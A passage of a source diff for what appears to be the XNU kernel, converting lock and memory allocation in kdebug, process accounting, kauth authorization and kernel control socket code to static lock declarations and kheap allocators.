wait_result = 
lck_spin_sleep_deadline(kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE, abstime); + wait_result = lck_spin_sleep_deadline(&kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE, abstime); } else { - wait_result = lck_spin_sleep(kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE); + wait_result = lck_spin_sleep(&kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE); } kds_waiter = 0; @@ -3377,7 +3353,7 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait) /* check the count under the spinlock */ bool threshold_exceeded = (kd_ctrl_page.kds_inuse_count >= n_storage_threshold); - lck_spin_unlock(kdw_spin_lock); + lck_spin_unlock(&kdw_spin_lock); ml_set_interrupts_enabled(s); if (!locked_wait) { @@ -3408,13 +3384,13 @@ kdbg_wakeup(void) */ bool s = ml_set_interrupts_enabled(false); - if (lck_spin_try_lock(kdw_spin_lock)) { + if (lck_spin_try_lock(&kdw_spin_lock)) { if (kds_waiter && (kd_ctrl_page.kds_inuse_count >= n_storage_threshold)) { kds_waiter = 0; need_kds_wakeup = true; } - lck_spin_unlock(kdw_spin_lock); + lck_spin_unlock(&kdw_spin_lock); } ml_set_interrupts_enabled(s); @@ -3448,9 +3424,6 @@ kdbg_control(int *name, u_int namelen, user_addr_t where, size_t *sizep) value = name[1]; } - kdbg_lock_init(); - assert(kd_ctrl_page.kdebug_flags & KDBG_LOCKINIT); - ktrace_lock(); /* @@ -4282,8 +4255,6 @@ kdebug_trace_start(unsigned int n_events, const char *filter_desc, ktrace_start_single_threaded(); - kdbg_lock_init(); - ktrace_kernel_configure(KTRACE_KDEBUG); kdbg_set_nkdbufs(n_events); diff --git a/bsd/kern/kern_acct.c b/bsd/kern/kern_acct.c index fd3172f7f..3f662a979 100644 --- a/bsd/kern/kern_acct.c +++ b/bsd/kern/kern_acct.c @@ -115,7 +115,6 @@ */ comp_t encode_comp_t(uint32_t, uint32_t); void acctwatch(void *); -void acct_init(void); /* * Accounting vnode pointer, and suspended accounting vnode pointer. 
States @@ -139,18 +138,11 @@ int acctresume = 4; /* resume when free space risen to > 4% */ int acctchkfreq = 15; /* frequency (in seconds) to check space */ -static lck_grp_t *acct_subsys_lck_grp; -static lck_mtx_t *acct_subsys_mutex; +static LCK_GRP_DECLARE(acct_subsys_lck_grp, "acct"); +static LCK_MTX_DECLARE(acct_subsys_mutex, &acct_subsys_lck_grp); -#define ACCT_SUBSYS_LOCK() lck_mtx_lock(acct_subsys_mutex) -#define ACCT_SUBSYS_UNLOCK() lck_mtx_unlock(acct_subsys_mutex) - -void -acct_init(void) -{ - acct_subsys_lck_grp = lck_grp_alloc_init("acct", NULL); - acct_subsys_mutex = lck_mtx_alloc_init(acct_subsys_lck_grp, NULL); -} +#define ACCT_SUBSYS_LOCK() lck_mtx_lock(&acct_subsys_mutex) +#define ACCT_SUBSYS_UNLOCK() lck_mtx_unlock(&acct_subsys_mutex) /* diff --git a/bsd/kern/kern_authorization.c b/bsd/kern/kern_authorization.c index 0181ee93d..a36bc6a51 100644 --- a/bsd/kern/kern_authorization.c +++ b/bsd/kern/kern_authorization.c @@ -57,10 +57,10 @@ * Authorization scopes. */ -lck_grp_t *kauth_lck_grp; -static lck_mtx_t *kauth_scope_mtx; -#define KAUTH_SCOPELOCK() lck_mtx_lock(kauth_scope_mtx); -#define KAUTH_SCOPEUNLOCK() lck_mtx_unlock(kauth_scope_mtx); +LCK_GRP_DECLARE(kauth_lck_grp, "kauth"); +static LCK_MTX_DECLARE(kauth_scope_mtx, &kauth_lck_grp); +#define KAUTH_SCOPELOCK() lck_mtx_lock(&kauth_scope_mtx); +#define KAUTH_SCOPEUNLOCK() lck_mtx_unlock(&kauth_scope_mtx); /* * We support listeners for scopes that have not been registered yet. @@ -92,7 +92,8 @@ struct kauth_local_listener { }; typedef struct kauth_local_listener *kauth_local_listener_t; -static TAILQ_HEAD(, kauth_listener) kauth_dangling_listeners; +static TAILQ_HEAD(, kauth_listener) kauth_dangling_listeners = + TAILQ_HEAD_INITIALIZER(kauth_dangling_listeners); /* * Scope listeners need to be reworked to be dynamic. 
@@ -114,7 +115,7 @@ struct kauth_scope { /* values for kauth_scope.ks_flags */ #define KS_F_HAS_LISTENERS (1 << 0) -static TAILQ_HEAD(, kauth_scope) kauth_scopes; +static TAILQ_HEAD(, kauth_scope) kauth_scopes = TAILQ_HEAD_INITIALIZER(kauth_scopes); static int kauth_add_callback_to_scope(kauth_scope_t sp, kauth_listener_t klp); static void kauth_scope_init(void); @@ -142,35 +143,14 @@ extern void release_pathbuff(char *path); void kauth_init(void) { - lck_grp_attr_t *grp_attributes; - - TAILQ_INIT(&kauth_scopes); - TAILQ_INIT(&kauth_dangling_listeners); - - /* set up our lock group */ - grp_attributes = lck_grp_attr_alloc_init(); - kauth_lck_grp = lck_grp_alloc_init("kauth", grp_attributes); - lck_grp_attr_free(grp_attributes); - /* bring up kauth subsystem components */ kauth_cred_init(); -#if CONFIG_EXT_RESOLVER - kauth_identity_init(); - kauth_groups_init(); -#endif kauth_scope_init(); -#if CONFIG_EXT_RESOLVER - kauth_resolver_init(); -#endif - /* can't alloc locks after this */ - lck_grp_free(kauth_lck_grp); - kauth_lck_grp = NULL; } static void kauth_scope_init(void) { - kauth_scope_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/); kauth_scope_process = kauth_register_scope(KAUTH_SCOPE_PROCESS, kauth_authorize_process_callback, NULL); kauth_scope_generic = kauth_register_scope(KAUTH_SCOPE_GENERIC, kauth_authorize_generic_callback, NULL); kauth_scope_fileop = kauth_register_scope(KAUTH_SCOPE_FILEOP, NULL, NULL); @@ -188,7 +168,7 @@ kauth_alloc_scope(const char *identifier, kauth_scope_callback_t callback, void /* * Allocate and populate the scope structure. */ - MALLOC(sp, kauth_scope_t, sizeof(*sp), M_KAUTH, M_WAITOK | M_ZERO); + sp = kheap_alloc(KM_KAUTH, sizeof(*sp), Z_WAITOK | Z_ZERO); if (sp == NULL) { return NULL; } @@ -207,7 +187,7 @@ kauth_alloc_listener(const char *identifier, kauth_scope_callback_t callback, vo /* * Allocate and populate the listener structure. 
*/ - MALLOC(lsp, kauth_listener_t, sizeof(*lsp), M_KAUTH, M_WAITOK); + lsp = kheap_alloc(KM_KAUTH, sizeof(*lsp), Z_WAITOK); if (lsp == NULL) { return NULL; } @@ -236,7 +216,7 @@ kauth_register_scope(const char *identifier, kauth_scope_callback_t callback, vo if (strncmp(tsp->ks_identifier, identifier, strlen(tsp->ks_identifier) + 1) == 0) { KAUTH_SCOPEUNLOCK(); - FREE(sp, M_KAUTH); + kheap_free(KM_KAUTH, sp, sizeof(struct kauth_scope)); return NULL; } } @@ -294,7 +274,7 @@ kauth_deregister_scope(kauth_scope_t scope) } } KAUTH_SCOPEUNLOCK(); - FREE(scope, M_KAUTH); + kheap_free(KM_KAUTH, scope, sizeof(struct kauth_scope)); return; } @@ -323,7 +303,7 @@ kauth_listen_scope(const char *identifier, kauth_scope_callback_t callback, void } /* table already full */ KAUTH_SCOPEUNLOCK(); - FREE(klp, M_KAUTH); + kheap_free(KM_KAUTH, klp, sizeof(struct kauth_listener)); return NULL; } } @@ -367,7 +347,7 @@ kauth_unlisten_scope(kauth_listener_t listener) sp->ks_flags &= ~KS_F_HAS_LISTENERS; } KAUTH_SCOPEUNLOCK(); - FREE(listener, M_KAUTH); + kheap_free(KM_KAUTH, listener, sizeof(struct kauth_listener)); return; } } @@ -378,7 +358,7 @@ kauth_unlisten_scope(kauth_listener_t listener) if (klp == listener) { TAILQ_REMOVE(&kauth_dangling_listeners, klp, kl_link); KAUTH_SCOPEUNLOCK(); - FREE(listener, M_KAUTH); + kheap_free(KM_KAUTH, listener, sizeof(struct kauth_listener)); return; } } @@ -1084,7 +1064,7 @@ kauth_filesec_alloc(int count) return NULL; } - MALLOC(fsp, kauth_filesec_t, KAUTH_FILESEC_SIZE(count), M_KAUTH, M_WAITOK); + fsp = kheap_alloc(KM_KAUTH, KAUTH_FILESEC_SIZE(count), Z_WAITOK); if (fsp != NULL) { fsp->fsec_magic = KAUTH_FILESEC_MAGIC; fsp->fsec_owner = kauth_null_guid; @@ -1118,7 +1098,7 @@ kauth_filesec_free(kauth_filesec_t fsp) panic("freeing KAUTH_FILESEC_WANTED"); } #endif - FREE(fsp, M_KAUTH); + kheap_free_addr(KM_KAUTH, fsp); } /* @@ -1206,7 +1186,7 @@ kauth_acl_alloc(int count) return NULL; } - MALLOC(aclp, kauth_acl_t, KAUTH_ACL_SIZE(count), M_KAUTH, 
M_WAITOK); + aclp = kheap_alloc(KM_KAUTH, KAUTH_ACL_SIZE(count), Z_WAITOK); if (aclp != NULL) { aclp->acl_entrycount = 0; aclp->acl_flags = 0; diff --git a/bsd/kern/kern_control.c b/bsd/kern/kern_control.c index dec9a91a9..1ee265e3d 100644 --- a/bsd/kern/kern_control.c +++ b/bsd/kern/kern_control.c @@ -96,7 +96,7 @@ enum ctl_status { struct ctl_cb { TAILQ_ENTRY(ctl_cb) next; /* controller chain */ - lck_mtx_t *mtx; + lck_mtx_t mtx; struct socket *so; /* controlling socket */ struct kctl *kctl; /* back pointer to controller */ void *userdata; @@ -129,13 +129,12 @@ struct ctl_cb { */ const u_int32_t ctl_maxunit = 65536; -static lck_grp_attr_t *ctl_lck_grp_attr = 0; -static lck_attr_t *ctl_lck_attr = 0; -static lck_grp_t *ctl_lck_grp = 0; -static lck_mtx_t *ctl_mtx; +static LCK_ATTR_DECLARE(ctl_lck_attr, 0, 0); +static LCK_GRP_DECLARE(ctl_lck_grp, "Kernel Control Protocol"); +static LCK_MTX_DECLARE_ATTR(ctl_mtx, &ctl_lck_grp, &ctl_lck_attr); /* all the controllers are chained */ -TAILQ_HEAD(kctl_list, kctl) ctl_head; +TAILQ_HEAD(kctl_list, kctl) ctl_head = TAILQ_HEAD_INITIALIZER(ctl_head); static int ctl_attach(struct socket *, int, struct proc *); static int ctl_detach(struct socket *); @@ -271,32 +270,6 @@ kern_control_init(struct domain *dp) VERIFY(!(dp->dom_flags & DOM_INITIALIZED)); VERIFY(dp == systemdomain); - ctl_lck_grp_attr = lck_grp_attr_alloc_init(); - if (ctl_lck_grp_attr == NULL) { - panic("%s: lck_grp_attr_alloc_init failed\n", __func__); - /* NOTREACHED */ - } - - ctl_lck_grp = lck_grp_alloc_init("Kernel Control Protocol", - ctl_lck_grp_attr); - if (ctl_lck_grp == NULL) { - panic("%s: lck_grp_alloc_init failed\n", __func__); - /* NOTREACHED */ - } - - ctl_lck_attr = lck_attr_alloc_init(); - if (ctl_lck_attr == NULL) { - panic("%s: lck_attr_alloc_init failed\n", __func__); - /* NOTREACHED */ - } - - ctl_mtx = lck_mtx_alloc_init(ctl_lck_grp, ctl_lck_attr); - if (ctl_mtx == NULL) { - panic("%s: lck_mtx_alloc_init failed\n", __func__); - /* NOTREACHED */ - 
} - TAILQ_INIT(&ctl_head); - for (i = 0, pr = &kctlsw[0]; i < kctl_proto_count; i++, pr++) { net_add_proto(pr, dp, 1); } @@ -306,10 +279,8 @@ static void kcb_delete(struct ctl_cb *kcb) { if (kcb != 0) { - if (kcb->mtx != 0) { - lck_mtx_free(kcb->mtx, ctl_lck_grp); - } - FREE(kcb, M_TEMP); + lck_mtx_destroy(&kcb->mtx, &ctl_lck_grp); + kheap_free(KHEAP_DEFAULT, kcb, sizeof(struct ctl_cb)); } } @@ -326,18 +297,13 @@ ctl_attach(struct socket *so, int proto, struct proc *p) int error = 0; struct ctl_cb *kcb = 0; - MALLOC(kcb, struct ctl_cb *, sizeof(struct ctl_cb), M_TEMP, M_WAITOK); + kcb = kheap_alloc(KHEAP_DEFAULT, sizeof(struct ctl_cb), Z_WAITOK | Z_ZERO); if (kcb == NULL) { error = ENOMEM; goto quit; } - bzero(kcb, sizeof(struct ctl_cb)); - kcb->mtx = lck_mtx_alloc_init(ctl_lck_grp, ctl_lck_attr); - if (kcb->mtx == NULL) { - error = ENOMEM; - goto quit; - } + lck_mtx_init(&kcb->mtx, &ctl_lck_grp, &ctl_lck_attr); kcb->so = so; so->so_pcb = (caddr_t)kcb; @@ -359,11 +325,11 @@ ctl_sofreelastref(struct socket *so) if (kcb != 0) { struct kctl *kctl; if ((kctl = kcb->kctl) != 0) { - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); TAILQ_REMOVE(&kctl->kcb_head, kcb, next); kctlstat.kcs_pcbcount--; kctlstat.kcs_gencnt++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); } kcb_delete(kcb); } @@ -474,10 +440,10 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p) bcopy(nam, &sa, sizeof(struct sockaddr_ctl)); - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); kctl = ctl_find_by_id_unit(sa.sc_id, sa.sc_unit); if (kctl == NULL) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return ENOENT; } @@ -485,30 +451,30 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p) (so->so_type != SOCK_STREAM)) || (!(kctl->flags & CTL_FLAG_REG_SOCK_STREAM) && (so->so_type != SOCK_DGRAM))) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EPROTOTYPE; } if (kctl->flags & CTL_FLAG_PRIVILEGED) { if (p == 0) { - 
lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EINVAL; } if (kauth_cred_issuser(kauth_cred_get()) == 0) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EPERM; } } if ((kctl->flags & CTL_FLAG_REG_ID_UNIT) || sa.sc_unit != 0) { if (kcb_find(kctl, sa.sc_unit) != NULL) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EBUSY; } } else if (kctl->setup != NULL) { error = (*kctl->setup)(&sa.sc_unit, &kcb->userdata); if (error != 0) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return error; } } else { @@ -527,7 +493,7 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p) } if (unit == ctl_maxunit) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EBUSY; } @@ -544,7 +510,7 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p) kctlstat.kcs_pcbcount++; kctlstat.kcs_gencnt++; kctlstat.kcs_connections++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); /* * rdar://15526688: Limit the send and receive sizes to sb_max @@ -580,14 +546,14 @@ done: #if DEVELOPMENT || DEBUG kcb->status = KCTL_DISCONNECTED; #endif /* DEVELOPMENT || DEBUG */ - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); TAILQ_REMOVE(&kctl->kcb_head, kcb, next); kcb->kctl = NULL; kcb->sac.sc_unit = 0; kctlstat.kcs_pcbcount--; kctlstat.kcs_gencnt++; kctlstat.kcs_conn_fail++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); } return error; } @@ -692,14 +658,14 @@ end: #if DEVELOPMENT || DEBUG kcb->status = KCTL_DISCONNECTED; #endif /* DEVELOPMENT || DEBUG */ - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); TAILQ_REMOVE(&kcb->kctl->kcb_head, kcb, next); kcb->kctl = NULL; kcb->sac.sc_unit = 0; kctlstat.kcs_pcbcount--; kctlstat.kcs_gencnt++; kctlstat.kcs_conn_fail++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); } out: ctl_kcb_done_clearing(kcb); @@ -731,16 +697,16 @@ ctl_disconnect(struct socket *so) #endif /* DEVELOPMENT || DEBUG */ socket_unlock(so, 0); - lck_mtx_lock(ctl_mtx); + 
lck_mtx_lock(&ctl_mtx); kcb->kctl = 0; kcb->sac.sc_unit = 0; while (kcb->usecount != 0) { - msleep(&kcb->usecount, ctl_mtx, 0, "kcb->usecount", 0); + msleep(&kcb->usecount, &ctl_mtx, 0, "kcb->usecount", 0); } TAILQ_REMOVE(&kctl->kcb_head, kcb, next); kctlstat.kcs_pcbcount--; kctlstat.kcs_gencnt++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); socket_lock(so, 0); ctl_kcb_done_clearing(kcb); ctl_kcb_decrement_use_count(kcb); @@ -1361,6 +1327,7 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt) struct kctl *kctl; int error = 0; void *data = NULL; + size_t data_len = 0; size_t len; if (sopt->sopt_level != SYSPROTO_CONTROL) { @@ -1385,9 +1352,10 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt) goto out; } if (sopt->sopt_valsize != 0) { - MALLOC(data, void *, sopt->sopt_valsize, M_TEMP, - M_WAITOK | M_ZERO); + data_len = sopt->sopt_valsize; + data = kheap_alloc(KHEAP_TEMP, data_len, Z_WAITOK | Z_ZERO); if (data == NULL) { + data_len = 0; error = ENOMEM; goto out; } @@ -1402,9 +1370,7 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt) socket_lock(so, 0); } - if (data != NULL) { - FREE(data, M_TEMP); - } + kheap_free(KHEAP_TEMP, data, data_len); break; case SOPT_GET: @@ -1414,9 +1380,10 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt) } if (sopt->sopt_valsize && sopt->sopt_val) { - MALLOC(data, void *, sopt->sopt_valsize, M_TEMP, - M_WAITOK | M_ZERO); + data_len = sopt->sopt_valsize; + data = kheap_alloc(KHEAP_TEMP, data_len, Z_WAITOK | Z_ZERO); if (data == NULL) { + data_len = 0; error = ENOMEM; goto out; } @@ -1449,9 +1416,8 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt) } } } - if (data != NULL) { - FREE(data, M_TEMP); - } + + kheap_free(KHEAP_TEMP, data, data_len); break; } @@ -1473,10 +1439,10 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data, struct kctl *kctl; u_int32_t n = 0; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); TAILQ_FOREACH(kctl, &ctl_head, next) n++; - lck_mtx_unlock(ctl_mtx); + 
lck_mtx_unlock(&ctl_mtx); bcopy(&n, data, sizeof(n)); error = 0; @@ -1494,9 +1460,9 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data, error = EINVAL; break; } - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); kctl = ctl_find_by_name(ctl_info.ctl_name); - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); if (kctl == 0) { error = ENOENT; break; @@ -1514,19 +1480,19 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data, } static void -kctl_tbl_grow() +kctl_tbl_grow(void) { struct kctl **new_table; uintptr_t new_size; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); if (kctl_tbl_growing) { /* Another thread is allocating */ kctl_tbl_growing_waiting++; do { - (void) msleep((caddr_t) &kctl_tbl_growing, ctl_mtx, + (void) msleep((caddr_t) &kctl_tbl_growing, &ctl_mtx, PSOCK | PCATCH, "kctl_tbl_growing", 0); } while (kctl_tbl_growing); kctl_tbl_growing_waiting--; @@ -1549,17 +1515,18 @@ kctl_tbl_grow() new_size = kctl_tbl_size + KCTL_TBL_INC; - lck_mtx_unlock(ctl_mtx); - new_table = _MALLOC(sizeof(struct kctl *) * new_size, - M_TEMP, M_WAIT | M_ZERO); - lck_mtx_lock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); + new_table = kheap_alloc(KHEAP_DEFAULT, sizeof(struct kctl *) * new_size, + Z_WAITOK | Z_ZERO); + lck_mtx_lock(&ctl_mtx); if (new_table != NULL) { if (kctl_table != NULL) { bcopy(kctl_table, new_table, kctl_tbl_size * sizeof(struct kctl *)); - _FREE(kctl_table, M_TEMP); + kheap_free(KHEAP_DEFAULT, kctl_table, + sizeof(struct kctl *) * kctl_tbl_size); } kctl_table = new_table; kctl_tbl_size = new_size; @@ -1581,7 +1548,7 @@ kctl_make_ref(struct kctl *kctl) { uintptr_t i; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); if (kctl_tbl_count >= kctl_tbl_size) { kctl_tbl_grow(); @@ -1632,7 +1599,7 @@ kctl_delete_ref(kern_ctl_ref kctlref) */ uintptr_t i = (((uintptr_t)kctlref) & KCTLREF_INDEX_MASK) - 1; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + 
lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); if (i < kctl_tbl_size) { struct kctl *kctl = kctl_table[i]; @@ -1657,7 +1624,7 @@ kctl_from_ref(kern_ctl_ref kctlref) uintptr_t i = (((uintptr_t)kctlref) & KCTLREF_INDEX_MASK) - 1; struct kctl *kctl = NULL; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); if (i >= kctl_tbl_size) { kctlstat.kcs_bad_kctlref++; @@ -1695,17 +1662,16 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref) return EINVAL; } - MALLOC(kctl, struct kctl *, sizeof(*kctl), M_TEMP, M_WAITOK); + kctl = kheap_alloc(KHEAP_DEFAULT, sizeof(struct kctl), Z_WAITOK | Z_ZERO); if (kctl == NULL) { return ENOMEM; } - bzero((char *)kctl, sizeof(*kctl)); - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); if (kctl_make_ref(kctl) == NULL) { - lck_mtx_unlock(ctl_mtx); - FREE(kctl, M_TEMP); + lck_mtx_unlock(&ctl_mtx); + kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl)); return ENOMEM; } @@ -1726,8 +1692,8 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref) /* Verify the same name isn't already registered */ if (ctl_find_by_name(userkctl->ctl_name) != NULL) { kctl_delete_ref(kctl->kctlref); - lck_mtx_unlock(ctl_mtx); - FREE(kctl, M_TEMP); + lck_mtx_unlock(&ctl_mtx); + kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl)); return EEXIST; } @@ -1771,8 +1737,8 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref) if (ctl_find_by_id_unit(userkctl->ctl_id, userkctl->ctl_unit)) { kctl_delete_ref(kctl->kctlref); - lck_mtx_unlock(ctl_mtx); - FREE(kctl, M_TEMP); + lck_mtx_unlock(&ctl_mtx); + kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl)); return EEXIST; } kctl->id = userkctl->ctl_id; @@ -1826,7 +1792,7 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref) kctlstat.kcs_reg_count++; kctlstat.kcs_gencnt++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); *kctlref = kctl->kctlref; @@ -1839,10 +1805,10 @@ ctl_deregister(void *kctlref) { struct kctl 
*kctl; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); if ((kctl = kctl_from_ref(kctlref)) == NULL) { kctlstat.kcs_bad_kctlref++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); if (ctl_debug != 0) { printf("%s invalid kctlref %p\n", __func__, kctlref); @@ -1851,7 +1817,7 @@ ctl_deregister(void *kctlref) } if (!TAILQ_EMPTY(&kctl->kcb_head)) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EBUSY; } @@ -1861,10 +1827,10 @@ ctl_deregister(void *kctlref) kctlstat.kcs_gencnt++; kctl_delete_ref(kctl->kctlref); - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); ctl_post_msg(KEV_CTL_DEREGISTERED, kctl->id); - FREE(kctl, M_TEMP); + kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl)); return 0; } @@ -1876,7 +1842,7 @@ ctl_find_by_name(const char *name) { struct kctl *kctl; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); TAILQ_FOREACH(kctl, &ctl_head, next) if (strncmp(kctl->name, name, sizeof(kctl->name)) == 0) { @@ -1892,12 +1858,12 @@ ctl_id_by_name(const char *name) u_int32_t ctl_id = 0; struct kctl *kctl; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); kctl = ctl_find_by_name(name); if (kctl) { ctl_id = kctl->id; } - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return ctl_id; } @@ -1908,7 +1874,7 @@ ctl_name_by_id(u_int32_t id, char *out_name, size_t maxsize) int found = 0; struct kctl *kctl; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); TAILQ_FOREACH(kctl, &ctl_head, next) { if (kctl->id == id) { break; @@ -1922,7 +1888,7 @@ ctl_name_by_id(u_int32_t id, char *out_name, size_t maxsize) strlcpy(out_name, kctl->name, maxsize); found = 1; } - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return found ? 
0 : ENOENT; } @@ -1936,7 +1902,7 @@ ctl_find_by_id_unit(u_int32_t id, u_int32_t unit) { struct kctl *kctl; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); TAILQ_FOREACH(kctl, &ctl_head, next) { if (kctl->id == id && (kctl->flags & CTL_FLAG_REG_ID_UNIT) == 0) { @@ -1956,7 +1922,7 @@ kcb_find(struct kctl *kctl, u_int32_t unit) { struct ctl_cb *kcb; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); TAILQ_FOREACH(kcb, &kctl->kcb_head, next) if (kcb->sac.sc_unit == unit) { @@ -1977,13 +1943,13 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags) lr_saved = __builtin_return_address(0); - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); /* * First validate the kctlref */ if ((kctl = kctl_from_ref(kctlref)) == NULL) { kctlstat.kcs_bad_kctlref++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); if (ctl_debug != 0) { printf("%s invalid kctlref %p\n", __func__, kctlref); @@ -1993,7 +1959,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags) kcb = kcb_find(kctl, unit); if (kcb == NULL || kcb->kctl != kctl || (so = kcb->so) == NULL) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return NULL; } /* @@ -2003,7 +1969,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags) /* * Respect lock ordering: socket before ctl_mtx */ - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); socket_lock(so, 1); /* @@ -2013,13 +1979,13 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags) i = (so->next_lock_lr + SO_LCKDBG_MAX - 1) % SO_LCKDBG_MAX; so->lock_lr[i] = lr_saved; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); if ((kctl = kctl_from_ref(kctlref)) == NULL || kcb->kctl == NULL) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); socket_unlock(so, 1); so = NULL; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); } else if (kctlflags != NULL) { *kctlflags = 
kctl->flags; } @@ -2029,7 +1995,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags) wakeup((event_t)&kcb->usecount); } - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return so; } @@ -2040,7 +2006,7 @@ ctl_post_msg(u_int32_t event_code, u_int32_t id) struct ctl_event_data ctl_ev_data; struct kev_msg ev_msg; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_NOTOWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_NOTOWNED); bzero(&ev_msg, sizeof(struct kev_msg)); ev_msg.vendor_code = KEV_VENDOR_APPLE; @@ -2072,7 +2038,7 @@ ctl_lock(struct socket *so, int refcount, void *lr) } if (so->so_pcb != NULL) { - lck_mtx_lock(((struct ctl_cb *)so->so_pcb)->mtx); + lck_mtx_lock(&((struct ctl_cb *)so->so_pcb)->mtx); } else { panic("ctl_lock: so=%p NO PCB! lr=%p lrh= %s\n", so, lr_saved, solockhistory_nr(so)); @@ -2111,7 +2077,7 @@ ctl_unlock(struct socket *so, int refcount, void *lr) printf("ctl_unlock: so=%llx sopcb=%x lock=%llx ref=%u lr=%llx\n", (uint64_t)VM_KERNEL_ADDRPERM(so), (uint64_t)VM_KERNEL_ADDRPERM(so->so_pcb, - (uint64_t)VM_KERNEL_ADDRPERM(((struct ctl_cb *)so->so_pcb)->mtx), + (uint64_t)VM_KERNEL_ADDRPERM(&((struct ctl_cb 